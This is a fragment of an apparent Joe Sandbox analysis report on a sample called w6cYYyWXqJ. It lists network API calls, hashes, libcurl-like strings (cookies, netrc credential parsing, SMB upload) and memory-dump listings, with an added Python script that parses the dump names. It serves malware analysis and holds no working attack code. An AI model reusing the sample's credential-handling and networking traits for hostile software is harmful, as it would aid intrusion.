                                  • Opcode Fuzzy Hash: f24183b7e25ba5799881c7269ffa9ae13e8561fb9cb8b38b7537b3722968b35d
                                  • Instruction Fuzzy Hash: CE01D8367082009BCB205A7C8884F6BBB99FF89375F040B54FD79971D2D726ED50A751
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 00F34AA4
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: 8bde76fd93e0cba0a58eb4a3dfe8116d9c3639430b451719b92a39fa408dc52b
                                  • Instruction ID: 5c851e9961e94de2e609a6fa001029750942a5afef0532c4b0442a763a0c2a37
                                  • Opcode Fuzzy Hash: 8bde76fd93e0cba0a58eb4a3dfe8116d9c3639430b451719b92a39fa408dc52b
                                  • Instruction Fuzzy Hash: 1151F771A057008BE7309F25DD49727B6E4EF41339F14093CE98A8A6E1E778F844EB12
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 00F4AFD1
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: 8ad6364f4cb2f9f1ca670ad2983eb25cd5cf948e7f94e0d71194a170c5ced8c5
                                  • Instruction ID: eeeefb808c5b58b51b31e8f6d41a7eb1dd75f8ddc148da8812a3f0b69dd22a6b
                                  • Opcode Fuzzy Hash: 8ad6364f4cb2f9f1ca670ad2983eb25cd5cf948e7f94e0d71194a170c5ced8c5
                                  • Instruction Fuzzy Hash: A511967084878595EB268F1CD4027F6B7F4EFD0339F109A18E9D942150F7329AC99BC2
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00F4A97F
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: e6eab1512b69fbd0d6b072da1247f98c9d76eb937d179519166f7e4ec3fb07f3
                                  • Instruction ID: 271dbdd7846ffec65259277acda5585b1b3b01f6951229a932a8e270a88ef355
                                  • Opcode Fuzzy Hash: e6eab1512b69fbd0d6b072da1247f98c9d76eb937d179519166f7e4ec3fb07f3
                                  • Instruction Fuzzy Hash: 3F01A2B6B40710AFC6148F14D885B56BBA5EF84730F06865DEA982B361C331AC109BE1
                                  APIs
                                  • socket.WS2_32(?,00F4B280,00000000,-00000001,00000000,00F4B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00F4AF66
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: eabb57356e2936a96e7e284ad61fc898797f1819ed141e1f3e869b7b0022d7f0
                                  • Instruction ID: a8a7f61df47a4167d2f64b79b2647ab73df2b05ec834f174c6312622a157db8b
                                  • Opcode Fuzzy Hash: eabb57356e2936a96e7e284ad61fc898797f1819ed141e1f3e869b7b0022d7f0
                                  • Instruction Fuzzy Hash: 6EE0EDB2E052216BD6649B58E844AABF7ADEFC4B20F055A49BC5463304C330AC558BE2
                                  APIs
                                  • closesocket.WS2_32(?,00F49422,?,?,?,?,?,?,?,?,?,?,?,00F33377,01314C60,00000000), ref: 00F4B04D
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 337b8a300b4e024026f55efb8c19da9383e3601d93523515dce7312e3a6a76fa
                                  • Instruction ID: c772b48277b51bd25ade0a07d2fe4457c53c7b543c1465174ebb7988df13bb0d
                                  • Opcode Fuzzy Hash: 337b8a300b4e024026f55efb8c19da9383e3601d93523515dce7312e3a6a76fa
                                  • Instruction Fuzzy Hash: 13D01234B0420157CA24DB18C884A577A6B7FD1721FA8CF6CE82C4A556DB3BDC879641
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,00EBAF56,?,00000001), ref: 00EE67FC
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: bc807fabd5575b0f65e1ad71502346d1389133d33ff6bf2454e231819673d2d9
                                  • Instruction ID: 2c403e2d6a0cdf6dc2de0a1d303b2a4452d207a0fd9d52673b7443b6c3eaab71
                                  • Opcode Fuzzy Hash: bc807fabd5575b0f65e1ad71502346d1389133d33ff6bf2454e231819673d2d9
                                  • Instruction Fuzzy Hash: 44C012F1218101AFC6088714D455B2F76D9DB44355F01581CB04691180EA305990CB16
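The dump-file names in the Memory Dump Source lists carry the region metadata an analyst needs for triage: which dumped regions of the process image were executable and writable, and which dump a given `ref:` address from the APIs lists falls in. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling. It parses those lines into records and summarizes them. The field order it assumes for a name such as `00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp` (process id, dump index, timestamp, base address, protection, unknown, memory type, module index) is inferred from the values on the page and is not documented by the report; the protection and type fields are decoded with the public Windows `PAGE_*` and `MEM_*` constants only because the observed values (0x04, 0x40, 0x80 and 0x1000000) match them exactly. The sample input is copied from the entry above.

```python
"""Parse "Memory Dump Source" lines from a Joe Sandbox report section and
summarize the dumped regions.

Assumption (not stated by the report): a dump file name is read as
dot-separated fields in the order
  process id . dump index . timestamp . base address . protection . unknown . memory type . module index
Protection and type are decoded with winnt.h constants because the values on
the page (0x04, 0x40, 0x80; 0x1000000) match them; other fields stay raw.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: lines copied from the report entry above (the
# "Download File" suffix is page residue and is tolerated by the regex).
SAMPLE = """\
Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
"""

# Documented Windows memory-protection and memory-type constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^(?:•\s*)?(Source File|Associated):\s*"
    r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.(\d{8})\.sdmp"
)


@dataclass(frozen=True)
class DumpRegion:
    role: str          # "Source File" or "Associated"
    pid: int           # assumed meaning of the first field
    dump_index: int
    base: int
    protection: int
    mem_type: int
    module_index: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:X}")

    @property
    def is_writable_executable(self) -> bool:
        # Either execute+write flavour means code can be written and then run in place.
        return self.protection in (0x40, 0x80)


def parse_dump_lines(text: str) -> list[DumpRegion]:
    """Return one DumpRegion per Source File / Associated line; other lines are ignored."""
    regions = []
    for line in text.splitlines():
        m = _DUMP_RE.match(line.strip())
        if not m:
            continue
        role, pid, idx, _ts, base, prot, _unknown, mtype, modidx = m.groups()
        regions.append(DumpRegion(role, int(pid), int(idx), int(base, 16),
                                  int(prot, 16), int(mtype, 16), int(modidx)))
    return regions


def rva(ref: int, image_base: int) -> int:
    """Convert an absolute 'ref:' address from the report into an RVA inside the dumped image."""
    if ref < image_base:
        raise ValueError("ref lies below the image base")
    return ref - image_base


def summarize(regions: list[DumpRegion]) -> dict:
    """Process ids seen, whether every region is MEM_IMAGE, and the bases of RWX regions."""
    return {
        "pids": sorted({r.pid for r in regions}),
        "all_image": all(r.mem_type == 0x1000000 for r in regions),
        "rwx_bases": sorted(r.base for r in regions if r.is_writable_executable),
    }


if __name__ == "__main__":
    regs = parse_dump_lines(SAMPLE)
    for r in regs:
        print(f"{r.role:12} base=0x{r.base:08X} {r.protection_name} {MEM_TYPE.get(r.mem_type, hex(r.mem_type))}")
    print(summarize(regs))
    print(f"ref 00F48FE6 -> RVA 0x{rva(0x00F48FE6, 0x00E80000):X}")
```

Feeding one entry's full Associated list gives the set of executable-and-writable image regions in the dumped process, and `rva()` of an API reference such as the report's `ref: 00F48FE6` against the stated `Offset: 00E80000` gives the offset to look for in the dumped PE.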
                                  APIs
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 06f32bf15212af5c123aa9fc73edd2427d115039bdbdaf87bd2f97bf67fc159e
                                  • Instruction ID: 0042dffe8a08441acf34a22a0957704e0098ce3e33d116817c4274aecb766ad9
                                  • Opcode Fuzzy Hash: 06f32bf15212af5c123aa9fc73edd2427d115039bdbdaf87bd2f97bf67fc159e
                                  • Instruction Fuzzy Hash: 4A31A2B4D097059FCB10FFB8C5846AEBBF4AF44348F00896DE898A7241E7749A44DB92
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                  • API String ID: 0-1371176463
                                  • Opcode ID: 55d216785b4247a3a680b36c355896b206e237f0338c482159a8322879479430
                                  • Instruction ID: aeb40c82ae5b52405d9b08deafc6de4931b4ce7d334a642c106a060cc872e1f2
                                  • Opcode Fuzzy Hash: 55d216785b4247a3a680b36c355896b206e237f0338c482159a8322879479430
                                  • Instruction Fuzzy Hash: D5B23870B083406BEB21AF25DE41F66BBD0AF55308F18553DF98DBA293E772D8029752
                                  APIs
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID: localeconv
                                  • String ID: $d$nil)
                                  • API String ID: 3737801528-394766432
                                  • Opcode ID: 87565dcb3a763fedd0ae375f82901bc76655fab7b9110a8bfab2ac4791b31941
                                  • Instruction ID: 4c06139b1f09fe28c59cce4a19c6c399ac55d51d0cee1b2e97c1b7fc0c785b56
                                  • Opcode Fuzzy Hash: 87565dcb3a763fedd0ae375f82901bc76655fab7b9110a8bfab2ac4791b31941
                                  • Instruction Fuzzy Hash: B01381706283428FD722DF28C18062BBBE1BFD9314F154E2DEA9597396D771E885CB42
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                  • API String ID: 0-122532811
                                  • Opcode ID: 93cd1d996b57ca2dce28caf561bba8f2b19b804d25bc971b38663e2194ac4c58
                                  • Instruction ID: b081be4a58b45302b92c3deebe12fdb6f552c1bd456aca6b04a6d179b04daabc
                                  • Opcode Fuzzy Hash: 93cd1d996b57ca2dce28caf561bba8f2b19b804d25bc971b38663e2194ac4c58
                                  • Instruction Fuzzy Hash: E64208B1B08701AFD709DE28CC41B6BB7E6EBC4704F049A2CF54DA72D1E775A9048B92
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-1574211403
                                  • Opcode ID: 36c155ee08073bda4b66715eadf135e263066b6a52d861ee707e70b9626e1fca
                                  • Instruction ID: 5e761a9f0848ff13ed49643106b8bc3e269814b1843f4ff999c8ec07c0aa3858
                                  • Opcode Fuzzy Hash: 36c155ee08073bda4b66715eadf135e263066b6a52d861ee707e70b9626e1fca
                                  • Instruction Fuzzy Hash: BF61F6A5E0C30167EB14A624AC52B3BB6999FD1328F04443DFC4AD6393FAF5DE04A253
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                  • API String ID: 0-1914377741
                                  • Opcode ID: 6365623316faaabfca562272002bc3f1e39f8b8a98cd15f04cd720d9287c091a
                                  • Instruction ID: 3017d9601b94cd6fa87dfdd21423f852d7b485d4a0067197232237bb5c48d00d
                                  • Opcode Fuzzy Hash: 6365623316faaabfca562272002bc3f1e39f8b8a98cd15f04cd720d9287c091a
                                  • Instruction Fuzzy Hash: 4B725B32A08B419FE7214A28C5457A777D29F9A348F08A62CEC857F293E776FC84C751
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  • Opcode ID: c9f05e65439661581934186cd909b5285e663fa53ab3adfe5a6a56a60cffa67b
                                  • Instruction ID: 6fec174fb82899b92ca9502dcfd9acd93a5c3d9b3060fa9c8eee849d57677ecf
                                  • Opcode Fuzzy Hash: c9f05e65439661581934186cd909b5285e663fa53ab3adfe5a6a56a60cffa67b
                                  • Instruction Fuzzy Hash: F322E472E04302ABEB209A24DC41B6B7AE4AF90319F04453CFD8D97292FB75D90CE752
                                  APIs
                                  • GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 00F48FE6
                                  • FreeMibTable.IPHLPAPI(?), ref: 00F4917A
                                  • FreeMibTable.IPHLPAPI(?), ref: 00F491A5
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID: Table$Free$AddressUnicast
                                  • String ID: 127.0.0.1$::1
                                  • API String ID: 576766143-3302937015
                                  • Opcode ID: 41c896a2999a5fc066caa0ada2703aecad5cff4f26c44cbf42ac65a7d2cb5414
                                  • Instruction ID: ca2747b5b78eac73c54fad965ca735555d55cc3c12d81817f989cc3fe9053749
                                  • Opcode Fuzzy Hash: 41c896a2999a5fc066caa0ada2703aecad5cff4f26c44cbf42ac65a7d2cb5414
                                  • Instruction Fuzzy Hash: 74A1C1B1E083429BE310DF24C844727BBE4AF95314F158A29FC488B261F7B5ED94E792
                                  Strings
                                   Memory Dump Source: same source file, associated dumps and snapshot as the first entry above (image base 00E80000, hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd)
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 1e3b3b65ef628edae89de81ec9c374ed1c10c9d124321490d59f546696ada443
                                  • Instruction ID: 895bb14bc2ac3d815800f6d5be9c87dccf782cdbc6d4ae572874c728b20e2ee0
                                  • Opcode Fuzzy Hash: 1e3b3b65ef628edae89de81ec9c374ed1c10c9d124321490d59f546696ada443
                                  • Instruction Fuzzy Hash: 8DC27B31A087418FD718DF28C49076AB7E2EFC9354F199A2DE89DAB351D730ED458B82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: 7c711b3abda4a8cbdb98af71cf35cd53aeaff7c523c1fdf1932df1fc43e69e19
                                  • Instruction ID: 53d8df56bd7a96cd2848b7ebf7b72245b22ef042af87bcebed63b1f93f9be4fc
                                  • Opcode Fuzzy Hash: 7c711b3abda4a8cbdb98af71cf35cd53aeaff7c523c1fdf1932df1fc43e69e19
                                  • Instruction Fuzzy Hash: DF829E71A083019FD714DE28C88476BB7E1AFD5728F249A2DF9ADA7391D730DC458B82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  • Opcode ID: 352eda0104b5c0def81c78a28bcc33fea37411fca241fbf167e4a74a1ab8f9a4
                                  • Instruction ID: 7d8ff7ba8366db07061b37f5f22a81e3c2843944fc4f1b831e7fbe2963456a14
                                  • Opcode Fuzzy Hash: 352eda0104b5c0def81c78a28bcc33fea37411fca241fbf167e4a74a1ab8f9a4
                                  • Instruction Fuzzy Hash: F6E137709083C59BE7119F22984576BBBE0AFA578CF14282DF8C577282E3B5CD48C762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  • Opcode ID: f3f6e018e9d24d3fc20519747f299b6092632a1fa9a1d4ed44f9be8dca0a5f97
                                  • Instruction ID: fcd57c8ab9a53f828c8eb93ecd0387c9ee3721d2d3853eaeaec35caedb3b8a22
                                  • Opcode Fuzzy Hash: f3f6e018e9d24d3fc20519747f299b6092632a1fa9a1d4ed44f9be8dca0a5f97
                                  • Instruction Fuzzy Hash: 1C62DFB0914781DBD714CF21C4907AAB3E4FF98304F04962DE8899B392E774FA94CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                  • API String ID: 0-2839762339
                                  • Opcode ID: 8e0a499b4dc25ee2f102a90d87677b611154d5e694dd1d27ba41ee2873d5f52d
                                  • Instruction ID: b40ddcdca5cd29516e152f94f7c38da8522d7fe3c9e70069b247f126ef8cdf36
                                  • Opcode Fuzzy Hash: 8e0a499b4dc25ee2f102a90d87677b611154d5e694dd1d27ba41ee2873d5f52d
                                  • Instruction Fuzzy Hash: 4B02C771A247429FE726DF288845B6BBBD5BF65304F04862CEA89872C3E771D804C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                  • API String ID: 0-3285806060
                                  • Opcode ID: 118bc3388e17112b5b59fe5ee5ab18a44b5750725d0c58beb7d800a4a5b1a51c
                                  • Instruction ID: 2003233f1095f0b4c593669f3a884e5e30d0bf59640098144291776d3f9018f0
                                  • Opcode Fuzzy Hash: 118bc3388e17112b5b59fe5ee5ab18a44b5750725d0c58beb7d800a4a5b1a51c
                                  • Instruction Fuzzy Hash: 45D12972E083018BD7249F28C84137ABBD1AF91374F148A3DF9D9A7291EB349944E7C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                   • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmp
